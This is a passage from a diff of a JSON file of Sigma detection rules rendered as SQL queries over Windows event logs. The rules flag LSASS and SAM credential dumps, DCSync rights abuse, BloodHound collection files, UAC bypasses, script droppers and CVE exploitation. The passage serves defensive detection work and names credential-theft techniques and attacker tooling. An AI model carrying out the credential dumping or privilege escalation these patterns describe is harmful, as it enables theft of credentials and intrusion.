LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" ], - "filename": "win_security_alert_enable_weak_encryption.yml" + "filename": "file_event_win_susp_colorcpl.yml" }, { - "title": "CVE-2023-23397 Exploitation Attempt", - "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", + "title": "BloodHound Collection 
Files", + "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", "status": "experimental", - "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", - "author": "Robert Lee @quantum_cookie", + "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "author": "C.J. May", "tags": [ - "attack.credential_access", - "attack.initial_access", - "cve.2023.23397" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" + "Some false positives may arise in some environment and this may require some tuning. Add addional filters or reduce level depending on the level of noise" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE 
'\\') AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" ], - "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" + "filename": "file_event_win_bloodhound_collection.yml" }, { - "title": "Active Directory User Backdoors", - "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", - "status": "test", - "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", - "author": "@neu5ron", + "title": "CVE-2022-24527 Microsoft Connected Cache LPE", + "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "status": "experimental", + "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1098", - "attack.persistence" + "attack.privilege_escalation", + "attack.t1059.001", + "cve.2022.24527" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_alert_ad_user_backdoors.yml" + "filename": "file_event_win_cve_2022_24527_lpe.yml" }, { - "title": "Powerview 
Add-DomainObjectAcl DCSync AD Extend Right", - "id": "2c99737c-585d-4431-b61a-c911d86ff32f", + "title": "UAC Bypass Using EventVwr", + "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "status": "experimental", - "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", - "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", + "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ - "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_account_backdoor_dcsync_rights.yml" + "filename": "file_event_win_uac_bypass_eventvwr.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Security", - "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", + "title": "WScript or CScript Dropper - File", + "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", + "author": "Tim Shelton", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" 
+ "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" + "filename": "file_event_win_cscript_wscript_dropper.yml" }, { - "title": "Password Dumper Activity on LSASS", - "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", - "status": "test", - "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", - "author": "sigma", + "title": "UEFI Persistence Via Wpbbin - FileCreation", + "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", + "status": "experimental", + "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. 
Which could be indicative of UEFI based persistence method", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND AccessMask = '0x705' AND ObjectType LIKE 'SAM\\_DOMAIN' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_lsass_dump.yml" + "filename": "file_event_win_wpbbin_persistence.yml" }, { - "title": "Successful Overpass the Hash Attempt", - "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", + "title": "Suspicious Desktopimgdownldr Target File", + "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", "status": "test", - "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", - "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", + "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.s0002", - "attack.t1550.002" + "attack.defense_evasion", + "attack.t1105" ], "falsepositives": [ - "Runas command-line tool using /netonly parameter" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND 
LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" ], - "filename": "win_security_overpass_the_hash.yml" + "filename": "file_event_win_susp_desktopimgdownldr_file.yml" }, { - "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", - "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", - "status": "test", - "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", - "author": "Ilyas Ochkov, oscd.community", + "title": "WerFault LSASS Process Memory Dump", + "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", + "status": "experimental", + "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" ], - "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" + "filename": 
"file_event_win_lsass_werfault_dump.yml" }, { - "title": "Ngrok Usage with Remote Desktop Service", - "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", + "title": "Potential SAM Database Dump", + "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", "status": "experimental", - "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", + "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" + "attack.credential_access", + "attack.t1003.002" ], - "filename": "win_terminalservices_rdp_ngrok.yml" - }, - { - "title": "New Firewall Exception Rule Added For A Suspicious Folder", - "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", - "status": "experimental", - "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", - "author": "frack113", "falsepositives": [ - "Any legitimate application that runs from the AppData user directory" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2') OR ((ApplicationPath LIKE '%AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' OR ApplicationPath LIKE '%AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' 
ESCAPE '\\'))))" + "Rare cases of administrative activity" ], - "filename": "win_firewall_as_add_rule_susp_folder.yml" - }, - { - "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", - "id": "79609c82-a488-426e-abcf-9f341a39365d", - "status": "experimental", - "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", - "author": "frack113, Nasreddine Bencherchali", "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2033' AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\') OR (ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\')))" ], - "filename": "win_firewall_as_delete_all_rules.yml" + "filename": "file_event_win_sam_dump.yml" }, { - "title": "Suspicious Remote AppX Package Locations", - "id": "8b48ad89-10d8-4382-a546-50588c410f0d", + "title": "Suspicious File Created Via OneNote Application", + "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "False positives should be very low with the extensions list cited. 
Especially if you don't heavily utilize OneNote.", + "Occasional FPs might occur if OneNote is used internally to share different embedded documents" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename 
LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" ], - "filename": "win_appxdeployment_server_susp_domains.yml" + "filename": "file_event_win_office_onenote_susp_dropped_files.yml" }, { - "title": "Suspicious AppX Package Locations", - "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", + "title": "Windows Binaries Write Suspicious Extensions", + "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", "status": "experimental", - "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "description": "Detects windows executables that writes files with suspicious extensions", "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\'))))" ], - "filename": "win_appxdeployment_server_susp_package_locations.yml" + "filename": "file_event_win_shell_write_susp_files_extensions.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation", - "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", + "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", "status": "test", - "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S", "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs 
MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" - ], - "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" - }, - { - "title": "Block Load Of Revoked Driver", - "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", - "description": "Detects blocked load attempts of revoked drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "status": "experimental", - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\'))" ], - "filename": "win_codeintegrity_revoked_driver.yml" + "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Code Integrity Attempted DLL 
Load", - "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", - "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", - "status": "experimental", + "title": "Adwind RAT / JRAT File Artifact", + "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution" - ], - "falsepositives": [ - "Antivirus products" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND 